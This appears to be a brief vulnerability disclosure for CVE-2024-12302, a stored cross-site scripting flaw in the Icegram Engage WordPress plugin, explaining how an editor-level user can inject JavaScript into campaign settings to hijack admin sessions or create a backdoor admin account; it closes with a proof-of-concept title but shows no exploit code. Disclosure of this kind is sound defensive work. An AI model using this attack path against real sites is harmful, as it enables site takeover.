Icegram Engage, a popular WordPress plugin for creating opt-ins, subscription forms, and campaigns, has been found to contain a critical Stored Cross-Site Scripting (XSS) vulnerability, CVE-2024-12302. This flaw allows attackers with editor-level access to inject malicious JavaScript into the settings of a campaign, which is then executed when the campaign is accessed. The injected script could be used to hijack an admin session or create a backdoor admin account, leading to full site compromise. With over 30,000 active installations, this vulnerability represents a serious threat to WordPress websites using Icegram Engage.
CVE-2024-12302 – Icegram Engage – Stored XSS to Admin Account Creation – POC
